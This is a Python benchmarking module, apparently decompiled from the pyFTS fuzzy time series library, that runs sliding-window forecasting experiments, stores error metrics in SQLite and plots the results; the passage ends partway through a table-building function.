/usr/local/lib/python3.6/dist-packages/pyFTS/benchmarks/benchmarks.py\n# Compiled at: 2019-03-25 15:02:05\n# Size of source mod 2**32: 40398 bytes\n__doc__ = 'Benchmark methods for FTS methods'\nimport datetime, time\nfrom copy import deepcopy\nimport traceback, matplotlib.pyplot as plt, numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom pyFTS.common import Transformations\nfrom pyFTS.models import song, chen, yu, ismailefendi, sadaei, hofts, pwfts, ifts, cheng, hwang\nfrom pyFTS.models.multivariate import mvfts, wmvfts, cmvfts\nfrom pyFTS.models.ensemble import ensemble\nfrom pyFTS.benchmarks import Measures, naive, arima, ResidualAnalysis, quantreg, knn\nfrom pyFTS.benchmarks import Util as bUtil\nfrom pyFTS.common import Util as cUtil\nfrom 
pyFTS.partitioners import Grid\ncolors = [\n 'grey', 'darkgrey', 'rosybrown', 'maroon', 'red', 'orange', 'gold', 'yellow', 'olive', 'green',\n 'darkgreen', 'cyan', 'lightblue', 'blue', 'darkblue', 'purple', 'darkviolet']\nncol = len(colors)\nstyles = [\n '-', '--', '-.', ':', '.']\nnsty = len(styles)\n\ndef __pop(key, default, kwargs):\n    if key in kwargs:\n        return kwargs.pop(key)\n    else:\n        return default\n\n\ndef get_benchmark_point_methods():\n    \"\"\"Return all non FTS methods for point forecasting\"\"\"\n    return [\n     naive.Naive, arima.ARIMA, quantreg.QuantileRegression]\n\n\ndef get_point_methods():\n    \"\"\"Return all FTS methods for point forecasting\"\"\"\n    return [\n     song.ConventionalFTS, chen.ConventionalFTS, yu.WeightedFTS, ismailefendi.ImprovedWeightedFTS,\n     cheng.TrendWeightedFTS, sadaei.ExponentialyWeightedFTS,\n     hofts.HighOrderFTS, hofts.WeightedHighOrderFTS, hwang.HighOrderFTS,\n     pwfts.ProbabilisticWeightedFTS]\n\n\ndef get_point_multivariate_methods():\n    \"\"\"Return all multivariate FTS methods for point forecasting\"\"\"\n    return [\n     mvfts.MVFTS, wmvfts.WeightedMVFTS, cmvfts.ClusteredMVFTS]\n\n\ndef get_benchmark_interval_methods():\n    \"\"\"Return all non FTS methods for point_to_interval forecasting\"\"\"\n    return [\n     arima.ARIMA, quantreg.QuantileRegression]\n\n\ndef get_interval_methods():\n    \"\"\"Return all FTS methods for point_to_interval forecasting\"\"\"\n    return [\n     ifts.IntervalFTS, pwfts.ProbabilisticWeightedFTS]\n\n\ndef get_probabilistic_methods():\n    \"\"\"Return all FTS methods for probabilistic forecasting\"\"\"\n    return [\n     ensemble.AllMethodEnsembleFTS, pwfts.ProbabilisticWeightedFTS]\n\n\ndef get_benchmark_probabilistic_methods():\n    \"\"\"Return all non FTS methods for probabilistic forecasting\"\"\"\n    return [\n     arima.ARIMA, quantreg.QuantileRegression, knn.KNearestNeighbors]\n\n\ndef sliding_window_benchmarks(data, windowsize, train=0.8, **kwargs):\n    \"\"\"\n    Sliding window benchmarks for FTS forecasters.\n\n    For each data window, train and test datasets will be split. For each train split, a partitioner\n    model will be created for each number of partitions and partitioning method. And for each partitioner,\n    order, steps ahead and FTS method, a forecasting model will be trained.\n\n    Then all trained models are benchmarked on the test data and the metrics are stored in a sqlite3 database\n    (identified by the 'file' parameter) for later analysis.\n\n    All of this processing can be distributed on a dispy cluster by setting the attribute 'distributed' to True\n    and passing the list of dispy nodes in the 'nodes' parameter.\n\n    The number of experiments is determined by the 'windowsize' and 'inc' parameters.\n\n    :param data: test data\n    :param windowsize: size of sliding window\n    :param train: percentage of sliding window data used to train the models\n    :param kwargs: dict, optional arguments\n\n    :keyword benchmark_methods: a list with Non FTS models to benchmark. The default is None.\n    :keyword benchmark_methods_parameters: a list with Non FTS models parameters. The default is None.\n    :keyword benchmark_models: A boolean value indicating if external FTS methods will be used on benchmark. The default is False.\n    :keyword build_methods: A boolean value indicating if the default FTS methods will be used on benchmark. The default is True.\n    :keyword dataset: the dataset name to identify the current set of benchmarks results on database.\n    :keyword distributed: A boolean value indicating if the forecasting procedure will be distributed in a dispy cluster. The default is False.\n    :keyword file: file path to save the results. The default is benchmarks.db.\n    :keyword inc: a float on interval [0,1] indicating the percentage of the windowsize to move the window\n    :keyword methods: a list with FTS class names. The default depends on the forecasting type and contains the list of all FTS methods.\n    :keyword models: a list with prebuilt FTS objects. The default is None.\n    :keyword nodes: a list with the dispy cluster nodes addresses. The default is [127.0.0.1].\n    :keyword orders: a list with orders of the models (for high order models). The default is [1,2,3].\n    :keyword partitions: a list with the numbers of partitions on the Universe of Discourse. The default is [10].\n    :keyword partitioners_models: a list with prebuilt Universe of Discourse partitioners objects. The default is None.\n    :keyword partitioners_methods: a list with Universe of Discourse partitioners class names. The default is [partitioners.Grid.GridPartitioner].\n    :keyword progress: If true a progress bar will be displayed during the benchmarks. The default is False.\n    :keyword start: in the multi step forecasting, the index of the data where to start forecasting. The default is 0.\n    :keyword steps_ahead: a list with the forecasting horizons, i. e., the number of steps ahead to forecast. The default is 1.\n    :keyword tag: a name to identify the current set of benchmarks results on database.\n    :keyword type: the forecasting type, one of these values: point(default), interval or distribution. The default is point.\n    :keyword transformations: a list with data transformations to apply. The default is [None].\n    \"\"\"\n
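    # Typical call (hypothetical data and settings; every keyword shown is\n    # optional and mirrors the docstring above):\n    #   sliding_window_benchmarks(data, 1000, train=0.8,\n    #       methods=[chen.ConventionalFTS, hofts.HighOrderFTS],\n    #       orders=[1, 2], partitions=[10, 20],\n    #       tag='experiment', dataset='TAIEX', type='point')\n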
    tag = __pop('tag', None, kwargs)\n    dataset = __pop('dataset', None, kwargs)\n    distributed = __pop('distributed', False, kwargs)\n    transformations = kwargs.get('transformations', [None])\n    progress = kwargs.get('progress', None)\n    type = kwargs.get('type', 'point')\n    orders = __pop('orders', [1, 2, 3], kwargs)\n    partitioners_models = __pop('partitioners_models', None, kwargs)\n    partitioners_methods = __pop('partitioners_methods', [Grid.GridPartitioner], kwargs)\n    partitions = __pop('partitions', [10], kwargs)\n    steps_ahead = __pop('steps_ahead', [1], kwargs)\n    methods = __pop('methods', None, kwargs)\n    models = __pop('models', None, kwargs)\n    pool = [] if models is None else models\n    if methods is None:\n        if type == 'point':\n            methods = get_point_methods()\n        else:\n            if type == 'interval':\n                methods = get_interval_methods()\n            elif type == 'distribution':\n                methods = get_probabilistic_methods()\n    build_methods = __pop('build_methods', True, kwargs)\n    if build_methods:\n        for method in methods:\n            mfts = method()\n            if mfts.is_high_order:\n                for order in orders:\n                    if order >= mfts.min_order:\n                        mfts = method()\n                        mfts.order = order\n                        pool.append(mfts)\n\n            else:\n                mfts.order = 1\n                pool.append(mfts)\n\n    benchmark_models = __pop('benchmark_models', False, kwargs)\n    benchmark_methods = __pop('benchmark_methods', None, kwargs)\n    benchmark_methods_parameters = __pop('benchmark_methods_parameters', None, kwargs)\n    benchmark_pool = [] if benchmark_models is None or not isinstance(benchmark_models, list) else benchmark_models\n    if benchmark_models is None:\n        if benchmark_methods is None:\n            if type == 'point' or type == 'partition':\n                benchmark_methods = get_benchmark_point_methods()\n            else:\n                if type == 'interval':\n                    benchmark_methods = get_benchmark_interval_methods()\n                elif type == 'distribution':\n                    benchmark_methods = 
get_benchmark_probabilistic_methods()\n if benchmark_methods is not None:\n for transformation in transformations:\n for count, model in enumerate(benchmark_methods, start=0):\n par = benchmark_methods_parameters[count]\n mfts = model(**par)\n mfts.append_transformation(transformation)\n benchmark_pool.append(mfts)\n\n if type == 'point':\n experiment_method = run_point\n synthesis_method = process_point_jobs\n else:\n if type == 'interval':\n experiment_method = run_interval\n synthesis_method = process_interval_jobs\n else:\n if type == 'distribution':\n experiment_method = run_probabilistic\n synthesis_method = process_probabilistic_jobs\n else:\n raise ValueError('Type parameter has a unkown value!')\n if distributed:\n import pyFTS.distributed.dispy as dispy\n nodes = kwargs.get('nodes', ['127.0.0.1'])\n cluster, http_server = dispy.start_dispy_cluster(experiment_method, nodes)\n jobs = []\n inc = __pop('inc', 0.1, kwargs)\n if progress:\n from tqdm import tqdm\n _tdata = len(data) / (windowsize * inc)\n _tasks = len(partitioners_models) * len(orders) * len(partitions) * len(transformations) * len(steps_ahead)\n _tbcmk = len(benchmark_pool) * len(steps_ahead)\n progressbar = tqdm(total=(_tdata * _tasks + _tdata * _tbcmk), desc='Benchmarks:')\n file = kwargs.get('file', 'benchmarks.db')\n conn = bUtil.open_benchmark_db(file)\n for ct, train, test in (cUtil.sliding_window)(data, windowsize, train, inc=inc, **kwargs):\n if benchmark_models != False:\n for model in benchmark_pool:\n for step in steps_ahead:\n kwargs['steps_ahead'] = step\n if not distributed:\n if progress:\n progressbar.update(1)\n try:\n job = experiment_method((deepcopy(model)), None, train, test, **kwargs)\n synthesis_method(dataset, tag, job, conn)\n except Exception as ex:\n print('EXCEPTION! ', model.shortname, model.order)\n traceback.print_exc()\n\n else:\n job = (cluster.submit)((deepcopy(model)), None, train, test, **kwargs)\n jobs.append(job)\n\n else:\n partitioners_pool = []\n if partitioners_models is None:\n for transformation in transformations:\n for partition in partitions:\n for partitioner in partitioners_methods:\n data_train_fs = partitioner(data=train, npart=partition, transformation=transformation)\n partitioners_pool.append(data_train_fs)\n\n else:\n partitioners_pool = partitioners_models\n for step in steps_ahead:\n for partitioner in partitioners_pool:\n for _id, model in enumerate(pool, start=0):\n kwargs['steps_ahead'] = step\n if not distributed:\n if progress:\n progressbar.update(1)\n try:\n job = experiment_method((deepcopy(model)), (deepcopy(partitioner)), train, test, **kwargs)\n synthesis_method(dataset, tag, job, conn)\n except Exception as ex:\n print('EXCEPTION! 
', model.shortname, model.order, partitioner.name, partitioner.partitions, str(partitioner.transformation))\n                            traceback.print_exc()\n\n                    else:\n                        job = (cluster.submit)((deepcopy(model)), (deepcopy(partitioner)), train, test, **kwargs)\n                        job.id = _id\n                        jobs.append(job)\n\n    if progress:\n        progressbar.close()\n    if distributed:\n        for job in jobs:\n            job()\n            if progress:\n                progressbar.update(1)\n            if job.status == dispy.dispy.DispyJob.Finished and job is not None:\n                tmp = job.result\n                synthesis_method(dataset, tag, tmp, conn)\n            else:\n                print('status', job.status)\n                print('result', job.result)\n                print('stdout', job.stdout)\n                print('stderr', job.exception)\n\n        cluster.wait()\n        dispy.stop_dispy_cluster(cluster, http_server)\n    conn.close()\n\n\ndef run_point(mfts, partitioner, train_data, test_data, window_key=None, **kwargs):\n    \"\"\"\n    Run the point forecasting benchmarks\n\n    :param mfts: FTS model\n    :param partitioner: Universe of Discourse partitioner\n    :param train_data: data used to train the model\n    :param test_data: data used to test the model\n    :param window_key: id of the sliding window\n    :param transformation: data transformation\n    :param indexer: seasonal indexer\n    :return: a dictionary with the benchmark results\n    \"\"\"\n    import time\n    from pyFTS.models import yu, chen, hofts, pwfts, ismailefendi, sadaei, song, cheng, hwang\n    from pyFTS.partitioners import Grid, Entropy, FCM\n    from pyFTS.benchmarks import Measures, naive, arima, quantreg\n    from pyFTS.common import Transformations\n    tmp = [\n     song.ConventionalFTS, chen.ConventionalFTS, yu.WeightedFTS, ismailefendi.ImprovedWeightedFTS,\n     cheng.TrendWeightedFTS, sadaei.ExponentialyWeightedFTS, hofts.HighOrderFTS, hwang.HighOrderFTS,\n     pwfts.ProbabilisticWeightedFTS]\n    tmp2 = [\n     Grid.GridPartitioner, Entropy.EntropyPartitioner, FCM.FCMPartitioner]\n    tmp4 = [\n     naive.Naive, arima.ARIMA, quantreg.QuantileRegression]\n    tmp3 = [\n     Measures.get_point_statistics]\n    tmp5 = [\n     Transformations.Differential]\n    indexer = kwargs.get('indexer', None)\n    steps_ahead = kwargs.get('steps_ahead', 1)\n    method = kwargs.get('method', None)\n    if mfts.benchmark_only:\n        _key = mfts.shortname + str(mfts.order if mfts.order is not None else '')\n    else:\n        pttr = str(partitioner.__module__).split('.')[(-1)]\n        _key = mfts.shortname + ' n = ' + str(mfts.order) + ' ' + pttr + ' q = ' + str(partitioner.partitions)\n        mfts.partitioner = partitioner\n        mfts.append_transformation(partitioner.transformation)\n    _key += str(steps_ahead)\n    _key += str(method) if method is not None else ''\n    _start = time.time()\n    (mfts.fit)(train_data, **kwargs)\n    _end = time.time()\n    times = _end - _start\n    _start = time.time()\n    _rmse, _smape, _u = (Measures.get_point_statistics)(test_data, mfts, **kwargs)\n    _end = time.time()\n    times += _end - _start\n    ret = {'key':_key, \n     'obj':mfts, 'rmse':_rmse, 'smape':_smape, 'u':_u, 'time':times, 'window':window_key, 'steps':steps_ahead, \n     'method':method}\n    return ret\n\n\ndef run_interval(mfts, partitioner, train_data, test_data, window_key=None, **kwargs):\n    \"\"\"\n    Run the interval forecasting benchmarks\n\n    :param mfts: FTS model\n    :param partitioner: Universe of Discourse partitioner\n    :param train_data: data used to train the model\n    :param test_data: data used to test the model\n    :param window_key: id of the sliding window\n    :param transformation: data transformation\n    :param indexer: seasonal indexer\n    :return: a dictionary with the benchmark results\n    \"\"\"\n    import time\n    from pyFTS.models import hofts, ifts, pwfts\n    from 
pyFTS.partitioners import Grid, Entropy, FCM\n from pyFTS.benchmarks import Measures, arima, quantreg\n tmp = [\n hofts.HighOrderFTS, ifts.IntervalFTS, pwfts.ProbabilisticWeightedFTS]\n tmp2 = [\n Grid.GridPartitioner, Entropy.EntropyPartitioner, FCM.FCMPartitioner]\n tmp4 = [\n arima.ARIMA, quantreg.QuantileRegression]\n tmp3 = [\n Measures.get_interval_statistics]\n steps_ahead = kwargs.get('steps_ahead', 1)\n method = kwargs.get('method', None)\n if mfts.benchmark_only:\n _key = mfts.shortname + str(mfts.order if mfts.order is not None else '') + str(mfts.alpha)\n else:\n pttr = str(partitioner.__module__).split('.')[(-1)]\n _key = mfts.shortname + ' n = ' + str(mfts.order) + ' ' + pttr + ' q = ' + str(partitioner.partitions)\n mfts.partitioner = partitioner\n mfts.append_transformation(partitioner.transformation)\n _key += str(steps_ahead)\n _key += str(method) if method is not None else ''\n _start = time.time()\n (mfts.fit)(train_data, **kwargs)\n _end = time.time()\n times = _end - _start\n _start = time.time()\n metrics = (Measures.get_interval_statistics)(test_data, mfts, **kwargs)\n _end = time.time()\n times += _end - _start\n ret = {'key':_key, \n 'obj':mfts, 'sharpness':metrics[0], 'resolution':metrics[1], 'coverage':metrics[2], 'time':times, \n 'Q05':metrics[3], 'Q25':metrics[4], 'Q75':metrics[5], 'Q95':metrics[6], 'winkler05':metrics[7], \n 'winkler25':metrics[8], 'window':window_key, \n 'steps':steps_ahead, 'method':method}\n return ret\n\n\ndef run_probabilistic(mfts, partitioner, train_data, test_data, window_key=None, **kwargs):\n \"\"\"\n Run the probabilistic forecasting benchmarks\n\n :param mfts: FTS model\n :param partitioner: Universe of Discourse partitioner\n :param train_data: data used to train the model\n :param test_data: ata used to test the model\n :param steps:\n :param resolution:\n :param window_key: id of the sliding window\n :param transformation: data transformation\n :param indexer: seasonal indexer\n :return: a dictionary with the benchmark results\n \"\"\"\n import time, numpy as np\n from pyFTS.models import hofts, ifts, pwfts\n from pyFTS.models.ensemble import ensemble\n from pyFTS.partitioners import Grid, Entropy, FCM\n from pyFTS.benchmarks import Measures, arima, quantreg, knn\n from pyFTS.models.seasonal import SeasonalIndexer\n tmp = [\n hofts.HighOrderFTS, ifts.IntervalFTS, pwfts.ProbabilisticWeightedFTS, arima.ARIMA,\n ensemble.AllMethodEnsembleFTS, knn.KNearestNeighbors]\n tmp2 = [\n Grid.GridPartitioner, Entropy.EntropyPartitioner, FCM.FCMPartitioner]\n tmp3 = [\n Measures.get_distribution_statistics, SeasonalIndexer.SeasonalIndexer, SeasonalIndexer.LinearSeasonalIndexer]\n indexer = kwargs.get('indexer', None)\n steps_ahead = kwargs.get('steps_ahead', 1)\n method = kwargs.get('method', None)\n if mfts.benchmark_only:\n _key = mfts.shortname + str(mfts.order if mfts.order is not None else '') + str(mfts.alpha)\n else:\n pttr = str(partitioner.__module__).split('.')[(-1)]\n _key = mfts.shortname + ' n = ' + str(mfts.order) + ' ' + pttr + ' q = ' + str(partitioner.partitions)\n mfts.partitioner = partitioner\n mfts.append_transformation(partitioner.transformation)\n _key += str(steps_ahead)\n _key += str(method) if method is not None else ''\n if mfts.has_seasonality:\n mfts.indexer = indexer\n _start = time.time()\n (mfts.fit)(train_data, **kwargs)\n _end = time.time()\n times = _end - _start\n _crps1, _t1, _brier = (Measures.get_distribution_statistics)(test_data, mfts, **kwargs)\n _t1 += times\n ret = {'key':_key, \n 'obj':mfts, 
'CRPS':_crps1, 'time':_t1, 'brier':_brier, 'window':window_key, 'steps':steps_ahead, \n 'method':method}\n return ret\n\n\ndef process_point_jobs(dataset, tag, job, conn):\n \"\"\"\n Extract information from a dictionary with point benchmark results and save it on a database\n\n :param dataset: the benchmark dataset name\n :param tag: alias for the benchmark group being executed\n :param job: a dictionary with the benchmark results\n :param conn: a connection to a Sqlite database\n :return:\n \"\"\"\n data = bUtil.process_common_data(dataset, tag, 'point', job)\n rmse = deepcopy(data)\n rmse.extend(['rmse', job['rmse']])\n bUtil.insert_benchmark(rmse, conn)\n smape = deepcopy(data)\n smape.extend(['smape', job['smape']])\n bUtil.insert_benchmark(smape, conn)\n u = deepcopy(data)\n u.extend(['u', job['u']])\n bUtil.insert_benchmark(u, conn)\n time = deepcopy(data)\n time.extend(['time', job['time']])\n bUtil.insert_benchmark(time, conn)\n\n\ndef process_interval_jobs(dataset, tag, job, conn):\n \"\"\"\n Extract information from an dictionary with interval benchmark results and save it on a database\n\n :param dataset: the benchmark dataset name\n :param tag: alias for the benchmark group being executed\n :param job: a dictionary with the benchmark results\n :param conn: a connection to a Sqlite database\n :return:\n \"\"\"\n data = bUtil.process_common_data(dataset, tag, 'interval', job)\n sharpness = deepcopy(data)\n sharpness.extend(['sharpness', job['sharpness']])\n bUtil.insert_benchmark(sharpness, conn)\n resolution = deepcopy(data)\n resolution.extend(['resolution', job['resolution']])\n bUtil.insert_benchmark(resolution, conn)\n coverage = deepcopy(data)\n coverage.extend(['coverage', job['coverage']])\n bUtil.insert_benchmark(coverage, conn)\n time = deepcopy(data)\n time.extend(['time', job['time']])\n bUtil.insert_benchmark(time, conn)\n Q05 = deepcopy(data)\n Q05.extend(['Q05', job['Q05']])\n bUtil.insert_benchmark(Q05, conn)\n Q25 = deepcopy(data)\n Q25.extend(['Q25', job['Q25']])\n bUtil.insert_benchmark(Q25, conn)\n Q75 = deepcopy(data)\n Q75.extend(['Q75', job['Q75']])\n bUtil.insert_benchmark(Q75, conn)\n Q95 = deepcopy(data)\n Q95.extend(['Q95', job['Q95']])\n bUtil.insert_benchmark(Q95, conn)\n W05 = deepcopy(data)\n W05.extend(['winkler05', job['winkler05']])\n bUtil.insert_benchmark(W05, conn)\n W25 = deepcopy(data)\n W25.extend(['winkler25', job['winkler25']])\n bUtil.insert_benchmark(W25, conn)\n\n\ndef process_probabilistic_jobs(dataset, tag, job, conn):\n \"\"\"\n Extract information from an dictionary with probabilistic benchmark results and save it on a database\n\n :param dataset: the benchmark dataset name\n :param tag: alias for the benchmark group being executed\n :param job: a dictionary with the benchmark results\n :param conn: a connection to a Sqlite database\n :return:\n \"\"\"\n data = bUtil.process_common_data(dataset, tag, 'density', job)\n crps = deepcopy(data)\n crps.extend(['crps', job['CRPS']])\n bUtil.insert_benchmark(crps, conn)\n time = deepcopy(data)\n time.extend(['time', job['time']])\n bUtil.insert_benchmark(time, conn)\n brier = deepcopy(data)\n brier.extend(['brier', job['brier']])\n bUtil.insert_benchmark(brier, conn)\n\n\ndef print_point_statistics(data, models, externalmodels=None, externalforecasts=None, indexers=None):\n \"\"\"\n Run point benchmarks on given models and data and print the results\n\n :param data: test data\n :param models: a list of FTS models to benchmark\n :param externalmodels: a list with benchmark models (façades 
for other methods)\n :param externalforecasts:\n :param indexers:\n :return:\n \"\"\"\n ret = \"Model\\t\\t& Order & RMSE\\t\\t& SMAPE & Theil's U\\t\\t\\\\\\\\ \\n\"\n for count, model in enumerate(models, start=0):\n _rmse, _smape, _u = Measures.get_point_statistics(data, model, indexers)\n ret += model.shortname + '\\t\\t& '\n ret += str(model.order) + '\\t\\t& '\n ret += str(_rmse) + '\\t\\t& '\n ret += str(_smape) + '\\t\\t& '\n ret += str(_u)\n ret += '\\t\\\\\\\\ \\n'\n\n if externalmodels is not None:\n l = len(externalmodels)\n for k in np.arange(0, l):\n ret += externalmodels[k] + '\\t\\t& '\n ret += ' 1\\t\\t& '\n ret += str(round(Measures.rmse(data, externalforecasts[k][:-1]), 2)) + '\\t\\t& '\n ret += str(round(Measures.smape(data, externalforecasts[k][:-1]), 2)) + '\\t\\t& '\n ret += str(round(Measures.UStatistic(data, externalforecasts[k][:-1]), 2))\n ret += '\\t\\\\\\\\ \\n'\n\n print(ret)\n\n\ndef print_interval_statistics(original, models):\n \"\"\"\n Run interval benchmarks on given models and data and print the results\n\n :param data: test data\n :param models: a list of FTS models to benchmark\n :return:\n \"\"\"\n ret = 'Model\\t& Order & Sharpness\\t\\t& Resolution\\t\\t& Coverage & .05 & .25 & .75 & .95\\t\\\\\\\\ \\n'\n for fts in models:\n _sharp, _res, _cov, _q5, _q25, _q75, _q95 = Measures.get_interval_statistics(original, fts)\n ret += fts.shortname + '\\t\\t& '\n ret += str(fts.order) + '\\t\\t& '\n ret += str(_sharp) + '\\t\\t& '\n ret += str(_res) + '\\t\\t& '\n ret += str(_cov) + ' &'\n ret += str(_q5) + ' &'\n ret += str(_q25) + ' &'\n ret += str(_q75) + ' &'\n ret += str(_q95) + '\\\\\\\\ \\n'\n\n print(ret)\n\n\ndef print_distribution_statistics(original, models, steps, resolution):\n \"\"\"\n Run probabilistic benchmarks on given models and data and print the results\n\n :param data: test data\n :param models: a list of FTS models to benchmark\n :return:\n \"\"\"\n ret = 'Model\\t& Order & Interval & Distribution\\t\\\\\\\\ \\n'\n for fts in models:\n _crps1, _crps2, _t1, _t2 = Measures.get_distribution_statistics(original, fts, steps, resolution)\n ret += fts.shortname + '\\t\\t& '\n ret += str(fts.order) + '\\t\\t& '\n ret += str(_crps1) + '\\t\\t& '\n ret += str(_crps2) + '\\t\\\\\\\\ \\n'\n\n print(ret)\n\n\ndef plot_point(axis, points, order, label, color='red', ls='-', linewidth=1):\n mi = min(points) * 0.95\n ma = max(points) * 1.05\n for k in np.arange(0, order):\n points.insert(0, None)\n\n axis.plot(points, color=color, label=label, ls=ls, linewidth=linewidth)\n return [\n mi, ma]\n\n\ndef plot_compared_series(original, models, colors, typeonlegend=False, save=False, file=None, tam=[20, 5], points=True, intervals=True, linewidth=1.5):\n \"\"\"\n Plot the forecasts of several one step ahead models, by point or by interval\n\n :param original: Original time series data (list)\n :param models: List of models to compare\n :param colors: List of models colors\n :param typeonlegend: Add the type of forecast (point / interval) on legend\n :param save: Save the picture on file\n :param file: Filename to save the picture\n :param tam: Size of the picture\n :param points: True to plot the point forecasts, False otherwise\n :param intervals: True to plot the interval forecasts, False otherwise\n :param linewidth:\n :return:\n \"\"\"\n fig = plt.figure(figsize=tam)\n ax = fig.add_subplot(111)\n mi = []\n ma = []\n legends = []\n ax.plot(original, color='black', label='Original', linewidth=(linewidth * 1.5))\n for count, fts in enumerate(models, 
start=0):\n        try:\n            if fts.has_point_forecasting and points:\n                forecasts = fts.forecast(original)\n                if isinstance(forecasts, np.ndarray):\n                    forecasts = forecasts.tolist()\n                mi.append(min(forecasts) * 0.95)\n                ma.append(max(forecasts) * 1.05)\n                for k in np.arange(0, fts.order):\n                    forecasts.insert(0, None)\n\n                lbl = fts.shortname + str(fts.order if (fts.is_high_order and not fts.benchmark_only) else '')\n                if typeonlegend:\n                    lbl += ' (Point)'\n                ax.plot(forecasts, color=(colors[count]), label=lbl, ls='-', linewidth=linewidth)\n            else:\n                if fts.has_interval_forecasting:\n                    if intervals:\n                        forecasts = fts.forecast_interval(original)\n                        lbl = fts.shortname + ' ' + str(fts.order if (fts.is_high_order and not fts.benchmark_only) else '')\n                        if not points and intervals:\n                            ls = '-'\n                        else:\n                            ls = '--'\n                        tmpmi, tmpma = cUtil.plot_interval(ax, forecasts, (fts.order), label=lbl, typeonlegend=typeonlegend, color=(colors[count]),\n                          ls=ls,\n                          linewidth=linewidth)\n                        mi.append(tmpmi)\n                        ma.append(tmpma)\n        except ValueError as ex:\n            print(fts.shortname)\n\n        handles0, labels0 = ax.get_legend_handles_labels()\n        lgd = ax.legend(handles0, labels0, loc=2, bbox_to_anchor=(1, 1))\n        legends.append(lgd)\n\n    ax.set_ylim([min(mi), max(ma)])\n    ax.set_ylabel('F(T)')\n    ax.set_xlabel('T')\n    ax.set_xlim([0, len(original)])\n\n\ndef plotCompared(original, forecasts, labels, title):\n    fig = plt.figure(figsize=[13, 6])\n    ax = fig.add_subplot(111)\n    ax.plot(original, color='k', label='Original')\n    for c in range(0, len(forecasts)):\n        ax.plot((forecasts[c]), label=(labels[c]))\n\n    handles0, labels0 = ax.get_legend_handles_labels()\n    ax.legend(handles0, labels0)\n    ax.set_title(title)\n    ax.set_ylabel('F(T)')\n    ax.set_xlabel('T')\n    ax.set_xlim([0, len(original)])\n    ax.set_ylim([min(original), max(original)])\n\n\ndef SelecaoSimples_MenorRMSE(original, parameters, modelo):\n    ret = []\n    errors = []\n    forecasted_best = []\n    print('Série Original')\n    fig = plt.figure(figsize=[20, 12])\n    fig.suptitle('Comparação de modelos ')\n    ax0 = fig.add_axes([0, 0.5, 0.65, 0.45])\n    ax0.set_xlim([0, len(original)])\n    ax0.set_ylim([min(original), max(original)])\n    ax0.set_title('Série Temporal')\n    ax0.set_ylabel('F(T)')\n    ax0.set_xlabel('T')\n    ax0.plot(original, label='Original')\n    min_rmse = 100000.0\n    best = None\n    for p in parameters:\n        sets = Grid.GridPartitioner(data=original, npart=p).sets\n        fts = modelo(str(p) + ' particoes')\n        fts.train(original, sets=sets)\n        forecasted = fts.forecast(original)\n        forecasted.insert(0, original[0])\n        ax0.plot(forecasted, label=(fts.name))\n        error = Measures.rmse(np.array(forecasted), np.array(original))\n        print(p, error)\n        errors.append(error)\n        if error < min_rmse:\n            min_rmse = error\n            best = fts\n            forecasted_best = forecasted\n\n    handles0, labels0 = ax0.get_legend_handles_labels()\n    ax0.legend(handles0, labels0)\n    ax1 = fig.add_axes([0.7, 0.5, 0.3, 0.45])\n    ax1.set_title('Comparação dos Erros Quadráticos Médios')\n    ax1.set_ylabel('RMSE')\n    ax1.set_xlabel('Quantidade de Partições')\n    ax1.set_xlim([min(parameters), max(parameters)])\n    ax1.plot(parameters, errors)\n    ret.append(best)\n    ret.append(forecasted_best)\n    print('\\nSérie Diferencial')\n    difffts = Transformations.differential(original)\n    errors = []\n    forecastedd_best = []\n    ax2 = fig.add_axes([0, 0, 0.65, 0.45])\n    ax2.set_xlim([0, len(difffts)])\n    ax2.set_ylim([min(difffts), max(difffts)])\n    ax2.set_title('Série Temporal')\n    ax2.set_ylabel('F(T)')\n    ax2.set_xlabel('T')\n    ax2.plot(difffts, label='Original')\n    min_rmse = 100000.0\n    bestd = None\n    for p in 
parameters:\n        sets = Grid.GridPartitioner(data=difffts, npart=p).sets\n        fts = modelo(str(p) + ' particoes')\n        fts.train(difffts, sets=sets)\n        forecasted = fts.forecast(difffts)\n        forecasted.insert(0, difffts[0])\n        ax2.plot(forecasted, label=(fts.name))\n        error = Measures.rmse(np.array(forecasted), np.array(difffts))\n        print(p, error)\n        errors.append(error)\n        if error < min_rmse:\n            min_rmse = error\n            bestd = fts\n            forecastedd_best = forecasted\n\n    handles0, labels0 = ax2.get_legend_handles_labels()\n    ax2.legend(handles0, labels0)\n    ax3 = fig.add_axes([0.7, 0, 0.3, 0.45])\n    ax3.set_title('Comparação dos Erros Quadráticos Médios')\n    ax3.set_ylabel('RMSE')\n    ax3.set_xlabel('Quantidade de Partições')\n    ax3.set_xlim([min(parameters), max(parameters)])\n    ax3.plot(parameters, errors)\n    ret.append(bestd)\n    ret.append(forecastedd_best)\n    return ret\n\n\ndef compareModelsPlot(original, models_fo, models_ho):\n    fig = plt.figure(figsize=[13, 6])\n    fig.suptitle('Comparação de modelos ')\n    ax0 = fig.add_axes([0, 0, 1, 1])\n    rows = []\n    for model in models_fo:\n        fts = model['model']\n        ax0.plot((model['forecasted']), label=(model['name']))\n\n    for model in models_ho:\n        fts = model['model']\n        ax0.plot((model['forecasted']), label=(model['name']))\n\n    handles0, labels0 = ax0.get_legend_handles_labels()\n    ax0.legend(handles0, labels0)\n\n\ndef compareModelsTable(original, models_fo, models_ho):\n    fig = plt.figure(figsize=[12, 4])\n    fig.suptitle('Comparação de modelos ')\n    columns = ['Modelo', 'Ordem', 'Partições', 'RMSE', 'MAPE (%)']\n    rows = []\n    for model in models_fo:\n        fts = model['model']\n        error_r = Measures.rmse(model['forecasted'], original)\n        error_m = round(Measures.mape(model['forecasted'], original) * 100, 2)\n        rows.append([model['name'], fts.order, len(fts.sets), error_r, error_m])\n\n    for model in models_ho:\n        fts = model['model']\n        error_r = Measures.rmse(model['forecasted'][fts.order:], original[fts.order:])\n        error_m = round(Measures.mape(model['forecasted'][fts.order:], original[fts.order:]) * 100, 2)\n        rows.append([model['name'], fts.order, len(fts.sets), error_r, error_m])\n\n    ax1 = fig.add_axes([0, 0, 1, 1])\n    ax1.set_xticks([])\n    ax1.set_yticks([])\n    ax1.table(cellText=rows, colLabels=columns,\n      cellLoc='center',\n      bbox=[0, 0, 1, 1])\n    sup = '\\\\begin{tabular}{'\n    header = ''\n    body = ''\n    footer = ''\n    for c in columns:\n        sup = sup + '|c'\n        if len(header) > 0:\n            header = header + ' & '\n        header = header + '\\\\textbf{' + c + '} '\n\n    sup = sup + '|} \\\\hline\\n'\n    header = header + '\\\\\\\\ \\\\hline \\n'\n    for r in rows:\n        lin = ''\n        for c in r:\n            if len(lin) > 0:\n                lin = lin + ' & '\n            lin = lin + str(c)\n\n        body = body + lin 